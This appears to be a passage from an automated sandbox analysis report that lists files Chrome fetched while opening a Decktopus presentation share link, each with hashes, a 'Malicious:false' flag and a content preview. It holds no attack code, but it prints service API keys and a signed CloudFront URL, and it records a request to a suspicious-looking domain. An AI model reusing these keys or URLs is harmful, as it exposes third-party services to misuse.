                                                                                                          Preview:wOF2..............}...............................>..H.`..D.6........ ..8..R...\.6.$.. . .....|..*[.lqE.6C...&..^.....n...qM~..|.8f*.<...{>F......d.u.y..J!.......d.[N.9........;..i.[..+.I.Y....+||!.rU7...G..2..+k..n&..L.`.g.....c4{..U.........F...DS.f.PY..........S..vY..Wl..BzME.D.~.M......t.y..@.1.....DD.....5.\.^...dy..*.'.,*......0....~..c~.#".=.].}A..mA...>.V.*.....,Lu.....]s..p.T{..%0....QS,.O.>......Av.+lE~....L!..B..*[E...S..L9.'^..K.g.....O..6A...r..#W....."rT..{]-+{.v*[vgO.iO..>k..s.N5e..M........U3@..i.(.w....[pu*|.....($.)..-..lA.....dW.hz.P.v,..15....1.....@..@.q.t.'E..bI........$..P.$NQv...s..e..= C3..!......6...M$:..G...{..hX.AfM..$.w....A.r....o?.......Y...s.C.r......w.j...]RSh.iR..}%5%5%u.r.Em[..b%Vsz.....J..;%.]..!..O........D.....?.D)d.......|.|.P.X....{..K...2.9..q:..U..n.......$.R...l.tLi..^.f-%..O.6..iJ.).&.;....T3..~o" -t;.....:.)....q.[`. .......Fk...Z.Ty....w.e'...t\... .><...9.U0\./....4.IS.h:x..t...m.;..$t.m`e..
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):404
                                                                                                          Entropy (8bit):5.672611481268431
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:6EECC58AB487287DA17EB2B297FFA471
                                                                                                          SHA1:209627F5B753D9E136EF740B766E5BD901641ECC
                                                                                                          SHA-256:2E562FA09FF920774CEA55EE8C6D9E0F6280E3B103415F94DDBC53B46F4BB558
                                                                                                          SHA-512:F74E2C210B3DEF50A091EA1085BF53B03D7AC38E9317792F4265F72335B4B9C7B81AEDB02EB0E9E6BC25A243405270B4D64D76FE6D05752372C4000611C68088
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://app.decktopus.com/env.js
                                                                                                          Preview:window.env = {. "BASE_URL": "https://apiv21.decktopus.com/api/",. "NR_LICENCE": "NRJS-43e56c8b880ca8453b7",. "NR_APPID": "1134428518",. "ENV_NAME": "PROD",. "POSTHOG_API_KEY": "phc_EPRVh4HnMtsZmdGbBkiWbbXjOHbrZDqmCA637H2IYwz",. "LD_SDK_KEY": "65dc8b71b13dd50fd060d125",. "SHARE_URL_BASE": "decktop.us",. "CNAME_URL": "cname.decktopus.com",. "GLEAP_API_KEY": "r5nfNhmzNkbIZ8AJbKfvpFxj7jQoAIHi".};
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, ASCII text, with very long lines (2216), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):2216
                                                                                                          Entropy (8bit):5.677056000204726
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:3F812856045BCD12657755E9E112B641
                                                                                                          SHA1:F9FB70DA07FFDDAE62006E30CBA690352100DE43
                                                                                                          SHA-256:9A8380469746E793BCD21D838FE1487666B83ED6CC4333644697F15B32500F08
                                                                                                          SHA-512:9BF5F176EE7E8ED0C2E9AEAD2F8E4DE1C40C19C1227C6D3F77C3538B55ACC5A3BE6548AE956262F25C5EBD4C1458A137AA9933D883C00831B7B412CA7DBF75B7
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://apiv21.decktopus.com/api/public/decks/4156935/slides/17419961/data/5588782
                                                                                                          Preview:{"code":200,"data":{"slideData":{"id":5588782,"sessionId":"00703cee-e71d-47e6-af2e-7cf6ab2fbce8","versionName":null,"isSwapColor":false,"coverIndex":null,"background":null,"tempSvg":{},"svgType":"GENERIC_1","slide":{"id":17419961,"slideNote":"WHOOPS","speakerNote":"WHOOPS"},"slideDataComponents":[{"component":{"id":18591714,"tempId":"f038d770-dcb5-4c71-bd97-19b42b11174e","sessionId":"00703cee-e71d-47e6-af2e-7cf6ab2fbce8","type":"1","positions":{"x":195.87511444091797,"y":50,"width":1528.249771118164,"height":355.62499237060547,"rotate":0,"scale":1,"zIndex":5001},"style":{"opacity":null,"isHidden":false},"data":{"mediaType":"0","mediaUrl":"https://cfv21.decktopus.com/users/2704600/b70baad4-47d6-4daf-a2fb-1c26609024a6.png?Expires=1724770121&Key-Pair-Id=K295BWQCL741S6&Signature=oUDQdQfwICI-uBXn5U6XBjmLnW~9ItTyOU9UP3a5BQiLBn1wHWCVp~kWACIdmjfeguis9R2TAWGZuLd4bVNVvUG4TLMOGzuo3IysbtBfUJt3VOu709vAQkZJC2zmqpomiUJ4kPb7xJs7dnn0VfmFyZFjU5jbBDuttLdjkkfU060BgiNHVWX46-TmgVRFMAWuqNeDXenPqqrqI0oaphUMmL
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):47992
                                                                                                          Entropy (8bit):5.605846858683577
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:CF3402D7483B127DED4069D651EA4A22
                                                                                                          SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                                                          SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                                                          SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15086
                                                                                                          Entropy (8bit):2.5297917989272483
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:F876FB771CD1CC7327915C2542713BC4
                                                                                                          SHA1:433F852C24CE5EE2928E61F3F2B3F64C947ADFDB
                                                                                                          SHA-256:858F37B7DEC134CE29A167B7D41C057BD6E99493DE03CBF4FCA0B06771688D1E
                                                                                                          SHA-512:8662AF8598E353341A708DD4D8D276466F61E5B4A0524B840332DF95E5A09C0128480B12BD6965D037FFB6180DAADA753551697DF4645E17F348D34751893B39
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......$...................................aO..aOp.aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..................aO'.aO..aO..aO..aO..aO..aO..aOS.aO$.aO..........................................................................aO..aOV.aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..................aO).aO..aO..aO..aO..aO..aO..aO..aO..aO..aO_.aO..`P..........................................................aO..aOv.aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..................aO,.aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO&.`P..................................................aO`.aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..................aO/.aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aOx.aO..........................................aO).aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..................aO2.aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..aO..a
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, ASCII text, with very long lines (1316), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):1316
                                                                                                          Entropy (8bit):4.938186275387683
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:370D1F14DC544BA3486D774CF8541987
                                                                                                          SHA1:5DFE00AC99053605FE978CE651D71A16B9BB36E7
                                                                                                          SHA-256:53017A2B80245D1F32B67F01737F2FA25116880E45DB2311FD7A3A65CAA27AAA
                                                                                                          SHA-512:4A479A5BDE010BC2BC8FAFD41A489F6C51CA9106A9529997E88029EA616D6140B319DEF283E21DC46DB7189402B996FFFD7B8AEB5B44DD3B682BC7F00A45C6C4
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://app.decktopus.com/share/MUYKd1
                                                                                                          Preview:<!doctype html><html lang="en"><head><base href="/"/><meta charset="utf-8"/><link rel="shortcut icon" href="/favicon.ico" type="image/x-icon"/><link rel="icon" href="/favicon.ico" type="image/x-icon"/><link rel="apple-touch-icon" sizes="180x180" href="/favicon/apple-touch-icon.png"/><link rel="mask-icon" href="/favicon/safari-pinned-tab.svg" color="#304ffe"/><link rel="icon" type="image/png" sizes="32x32" href="/favicon/favicon-32x32.png"/><link rel="icon" type="image/png" sizes="16x16" href="/favicon/favicon-16x16.png"/><meta name="viewport" content="width=device-width,height=device-height,initial-scale=1,maximum-scale=1"/><meta name="msapplication-TileColor" content="#ffffff"/><meta name="theme-color" content="#ffffff"/><meta name="robots" content="noindex"/><meta name="description" content="Create Better Presentations | AI Presentation Assistant"/><link rel="manifest" href="/manifest.json"/><title>Decktopus | Create Better Presentations | AI Presentation Assistant</title><script id=
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6494
                                                                                                          Entropy (8bit):5.062071281143654
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:4709DB8FC8BB6C301004620A70DB7BA5
                                                                                                          SHA1:223BB241666076ECBC5E2774C23F0C21F418115D
                                                                                                          SHA-256:C181DA26130BA89708767DFB89D20A082ED54F059B8CD828E20862C1C3A50D33
                                                                                                          SHA-512:25B9706169ABCD1DC15EF156C4C1A6156D825929BBAE4B8B24E4EFD632981126845305A7E85E295A32D0EF165660102828AFB54F669A062AAEE3541E6B246D16
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:{"FE_110_LANGUAGE_SELECTION":{"flagVersion":4,"trackEvents":false,"value":true,"variation":0,"version":169},"FE_112_UPGRADE_MODALS":{"flagVersion":4,"trackEvents":false,"value":true,"variation":0,"version":169},"FE_120_ICON_FRAMES":{"flagVersion":10,"trackEvents":false,"value":true,"variation":0,"version":169},"FE_124_AI_FLOW_FIX":{"flagVersion":6,"trackEvents":false,"value":true,"variation":0,"version":169},"FE_13_CHANGE_FOLDER_DIALOG":{"flagVersion":4,"trackEvents":false,"value":true,"variation":0,"version":169},"FE_161_LIST_FREEZE":{"flagVersion":4,"trackEvents":false,"value":true,"variation":0,"version":169},"FE_170_PREVENT_TEXT_DRAG_ON_EDIT":{"flagVersion":4,"trackEvents":false,"value":true,"variation":0,"version":169},"FE_178_INFINITE_ELEMENTS_BUG":{"flagVersion":4,"trackEvents":false,"value":true,"variation":0,"version":169},"FE_186_TEXT_MENU_QUILL":{"flagVersion":5,"trackEvents":false,"value":true,"variation":0,"version":169},"FE_198_SAFARI_ISSUES":{"flagVersion":13,"trackEvent
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7181
                                                                                                          Entropy (8bit):4.922794311075666
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:A9AE7EC8A45B086850F6C352A7FE7453
                                                                                                          SHA1:E610AEED72BFA43BB379F444A0B3E0B531197FD4
                                                                                                          SHA-256:E2D9CCEE9355BF68E1138180F1D3F9625C9982854E3F55151A7610D3FB2EBBE1
                                                                                                          SHA-512:915CAF97C79CAA8927A410794F846E02CE26284900339D08E3C31E26804B9F09AD3E6F92F4207D21D3FC41AC8FC7E3CB5DBC6C4BF9B248482D9EDC0651716371
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:{"code":200,"data":{"deck":{"id":4156935,"viewMode":"0","name":"General Filters, Inc","state":"1","organizationId":null,"type":"0","activeDeckDataId":683549,"ownerUser":null,"deckQAs":[],"deckTipGroups":[],"deckPrompt":null,"deckShare":null,"userDecks":[]},"deckData":{"id":683549,"sessionId":"00703cee-e71d-47e6-af2e-7cf6ab2fbce8","versionName":null,"data":{"userThemePreferences":{"colorMap":{}},"slides":[{"slideId":17419961,"slideTempId":"8be821e1-003e-4eb7-9a22-f6b462dc9357","slideDataId":5588782,"isMaster":false,"isDeleted":false,"orderIndex":1,"soundUrl":null}],"notes":{"icons":[]},"parameters":{}},"theme":{"id":2,"name":"tokyo","themeCategoryId":1,"data":{"colorMap":{"background":{"default":{"colors":["fourth"]},"swap":{"colors":["first"]}},"textHighlight":{"default":{"colors":["fourth"]},"swap":{"colors":["first"]}},"textHighlightBg":{"default":{"colors":["first"]},"swap":{"colors":["fourth"]}},"jumbo":{"default":{"colors":["first"]},"swap":{"colors":["fourth"]}},"title":{"default
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):174
                                                                                                          Entropy (8bit):4.4435858534741
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:0133A1F266F4740A5D50DE1410FC1CA5
                                                                                                          SHA1:64955AA4F31415A69929B984665530F3C8C65E1D
                                                                                                          SHA-256:94C5140FFBCABF14891B919CB87810EF0B7307CFE424DFFE47D25FB5FD6A551C
                                                                                                          SHA-512:D6534F3C3305B72BDAEEE3C11CF0C193832E07DE6BBC2D41F577B7C25927BEB2F69DA987E57953BAACE421A805A91A26CDB2125ACAE99C3B7E84272B219E91EE
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:{"type": "validation_error", "code": "no_data", "detail": "No data found. Make sure to use a POST request when sending the payload in the body of the request.", "attr": null}
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (1524)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):8247
                                                                                                          Entropy (8bit):5.258074494977607
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:05FA6BA2EB3E7783863ECD55349C20F7
                                                                                                          SHA1:1BE8A11CAA51E9988920130DF05CC1FD2F260195
                                                                                                          SHA-256:9951D84E48DC5EC2EFBFDE1247A043C70359CF88E8AEC2D0A4BA8021E08D66E0
                                                                                                          SHA-512:E07944392BB7FE76F88FF006F97350FAB270575B3F1F53E07885632471945D25DB56EE0757E1B4BDD43580328AA113EDD4EB997011D816377860859D95515C5B
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://sibautomation.com/sa.js?key=iavczyxvxovxsvex575j73fd
                                                                                                          Preview:window.sib.client_key!==''&&(function(){"use strict";var config={url:'https://in-automate.brevo.com/p',tracker_url:'https://in-automate.brevo.com',com_err_msg:'Please try again later/ Report this error to Sendinblue Team',cookie_exp:182*24,if_url:'https://sibautomation.com/cm.html?key='+window.sib.client_key,is_secure:'false',base_url:'https://in-automate.brevo.com',custom_url_parsing:'true',tracking_enabled:{track:'true',identify:'true',page:'true',trackLink:'true',viewProduct:'true',viewCategory:'true',search:'true',}},Helper=new hl();var iframe,cm;function q(){while(window.sib.equeue.length){(function(obj){for(var k in obj){if(typeof window.sib[k]==="function"){setTimeout(function(){if(typeof window.sib[k]==="function"){window.sib[k](obj[k][0],obj[k][1],obj[k][2],obj[k][3]);}},200);}}})(window.sib.equeue.shift());}}.function mo(t){var to=Object(t);for(var i=1;i<arguments.length;i++){var n=arguments[i];if(n!=null){for(var k in n){Object.prototype.hasOwnProperty.call(n,k)&&(to[k]=n[k]
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:HTML document, ASCII text, with CRLF, LF line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):1249
                                                                                                          Entropy (8bit):5.242453121762845
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:F58515DFE987F7E027C8A71BBC884621
                                                                                                          SHA1:BEC6AEBF5940EA88FBBFF5748D539453D49FA284
                                                                                                          SHA-256:679E7E62B81267C93D0778083AE0FD0EFE24172FF0AC581835B54165B3D9ED43
                                                                                                          SHA-512:F085346A38318F7935D76909DB0367862924CC9B0D96256F7FF4E8999C041E610BBCDE8CA56C92673BDE0991C85E9C9D9B6726ABD91D0C3177462C80D4A99140
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://quantumluminaa.sa.com/favicon.ico
                                                                                                          Preview:<!DOCTYPE html>.<html style="height:100%">.<head>.<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">.<title> 404 Not Found..</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>.<body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">.<div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">. <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1>.<h2 style="margin-top:20px;font-size: 30px;">Not Found..</h2>.<p>The resource requested could not be found on this server!</p>.</div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):3233
                                                                                                          Entropy (8bit):5.460958761425447
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:B9F534FF65BA838A82A280E45B55E674
                                                                                                          SHA1:D33057211CD07B49559F1BC707D2F77B48611658
                                                                                                          SHA-256:5DE8B4EC91FCEA322DC09C4EA2F79B6BE79B3FB2F1BE24C56DD838DD0492DBA0
                                                                                                          SHA-512:CC934BE36FE28B94FCD6B00B5DCB78B2955EEC165315BD57551E007EBB6B016532A4DDB9AF95738417D714FE61A6CD1099C2FFC67F32C6B6E5095B8D9A7D5EF9
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://fonts.googleapis.com/css2?family=Nunito&family=PT+Sans&display=swap
                                                                                                          Preview:/* cyrillic-ext */.@font-face {. font-family: 'Nunito';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/nunito/v26/XRXI3I6Li01BKofiOc5wtlZ2di8HDLshdTk3j77e.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Nunito';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/nunito/v26/XRXI3I6Li01BKofiOc5wtlZ2di8HDLshdTA3j77e.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* vietnamese */.@font-face {. font-family: 'Nunito';. font-style: normal;. font-weight: 400;. font-display: swap;. src: url(https://fonts.gstatic.com/s/nunito/v26/XRXI3I6Li01BKofiOc5wtlZ2di8HDLshdTs3j77e.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                                          Category:dropped
                                                                                                          Size (bytes):61
                                                                                                          Entropy (8bit):3.990210155325004
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                                          SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                                          SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                                          SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:GIF image data, version 89a, 1 x 1
                                                                                                          Category:dropped
                                                                                                          Size (bytes):24
                                                                                                          Entropy (8bit):2.459147917027245
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                          SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                          SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                          SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          Preview:GIF89a.......,..........
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (45034)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):45035
                                                                                                          Entropy (8bit):5.400557193761079
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:C4D5335B2B69C6998EE34F5F7B3E246F
                                                                                                          SHA1:AF0AE01ECCEE153877976D5C7D6500AA9C380B60
                                                                                                          SHA-256:7EDA47B0C02C44BDAA43A5B14857F1257DDBD620B0397C32AA3AE8BAF769AB55
                                                                                                          SHA-512:1C62C5D29C56848C258701F2E6B39E2152A3CACEB2C96F19ADB8542FDCC233F42BD0FAE9D03C8EA04F6B4490D0B69FD24F62B6D18A14A31D87E24906CFC88C58
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://challenges.cloudflare.com/turnstile/v0/b/6790c32b9fc9/api.js
                                                                                                          Preview:"use strict";(function(){function St(e,r,a,o,c,u,g){try{var _=e[u](g),p=_.value}catch(f){a(f);return}_.done?r(p):Promise.resolve(p).then(o,c)}function Ot(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var u=e.apply(r,a);function g(p){St(u,o,c,g,_,"next",p)}function _(p){St(u,o,c,g,_,"throw",p)}g(void 0)})}}function P(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):P(e,r)}function Oe(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Ce(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Oe(e,c,a[c])})}return e}function _r(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:JSON data
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):15620
                                                                                                          Entropy (8bit):4.930063495938045
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:959BB2733D13B148F64A76DD0708475F
                                                                                                          SHA1:832B1C8505BE11610C930AE48FCDBBB519E90B2B
                                                                                                          SHA-256:0979F053A06369F9AF3C91E615A558BA34549D2D49F7161E1A7DA14995C3F0CD
                                                                                                          SHA-512:394093D24C80C2D890C77AA8CBE87F718A30B4D3F9A5FE81593FAE2E88A5B6FA8DCFF3BC15E92DAA8E50BD2C0672E16C1A2CC7D9B9B22D9D0F5AC7BA2B72D272
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://api.gleap.io/config/r5nfNhmzNkbIZ8AJbKfvpFxj7jQoAIHi?lang=en
                                                                                                          Preview:{"flowConfig":{"newsMenuLabel":"News","checklistMenuLabel":"Onbarding","featureRequestsMenuLabel":"Roadmap","allConversationsMenuLabel":"Messages","knowledgeBaseMenuLabel":"Help","welcomeText":"How can we help?","replyTime":"within a few minutes","color":"#4f61ff","backgroundColor":"#FFFFFF","headerColor":"#4f61ff","buttonColor":"#485bff","borderRadius":21,"buttonX":20,"buttonY":20,"operatorAvatarImage":"https://staticfiles.gleap.io/gfeedback_widgets/PgHvs2cWga85lnPdmDdquQN2gl0fJtFUdkeFcKMXRUs6F3PGpaFzCgcGBXdYIn79JYVn02RhVgg.png","operatorName":"Deckto","logo":"https://staticfiles.gleap.io/gfeedback_widgets/Fv2CqD6OJES9uRcFsHGQ9aoGB816gu5RneGBUyJXZYD3tmKC2DElVUpQqLLpPvDoSBpepXo5bs0.svg","buttonLogo":"","customCSS":"","hideFeatureRequests":false,"hideNews":false,"hideAllConversations":false,"hideKnowledgeBase":false,"enableOpeningTimesBot":true,"openingTimes":[{"day":"Weekdays","openingTime":"09:00","closingTime":"17:00","replyTime":""}],"timezone":"Europe/Istanbul","showOnlineStatus":t
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (34229)
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):363534
                                                                                                          Entropy (8bit):5.554547979468408
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:5E80582290195266ABA963ACF85DCE72
                                                                                                          SHA1:72367CC8A69F03B3E5D47B24E92DB6B8417F78A7
                                                                                                          SHA-256:A5522E7B31BDBAE58EC27C55A59F826C7DD858ABFDD748C477E867CD7E747C4D
                                                                                                          SHA-512:BC6CA5F84ED49E77037B194A31998087F6E3915D903144037690EF825E175F6F06494B89C7912E24DE0AC556A2AEAD61C35AEE0FD9E6ED98BA694D52AE8ECE7E
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://www.googletagmanager.com/gtm.js?id=GTM-T26G8Z8
                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"119",. . "macros":[{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__e"},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__gas","vtp_cookieDomain":"auto","vtp_doubleClick":false,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp_useHashAutoLink":false,"vtp_decorateFormsAutoLink":false,"vtp_enableLinkId":false,"vtp_enableEcommerce":false,"vtp_trackingId":"UA-150754925-2","vtp_enableRecaptchaOption":false,"vtp_enableUaRlsa":false,"vtp_enableUseInternalVersion":false,"vtp_enableGA4Schema":true},{"function":"__gas","vtp_cookieDomain":"auto","vtp_doubleClick":false,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp
                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          File Type:ASCII text, with very long lines (17320), with no line terminators
                                                                                                          Category:downloaded
                                                                                                          Size (bytes):17320
                                                                                                          Entropy (8bit):5.756027257143914
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:
                                                                                                          MD5:2FDF3E79D5E851201A0D52A886453D8B
                                                                                                          SHA1:0CCA49213DC761C62B82C185E3A7C597CBE47515
                                                                                                          SHA-256:12B5EACCD8A9D81A6A12512566D2B72AA7C100B4A261A08EE6AAE4679A9E36B4
                                                                                                          SHA-512:42C03ECEAE90964D9A6DD5999ADC52E5A1899D549B71966881EC43CD3BAAA79A188A8E50212AE720B8C85C094EC06DB09461D7C4E349BD53E526811BC3C0979D
                                                                                                          Malicious:false
                                                                                                          Reputation:unknown
                                                                                                          URL:https://cdn.taboola.com/scripts/eid.es5.js
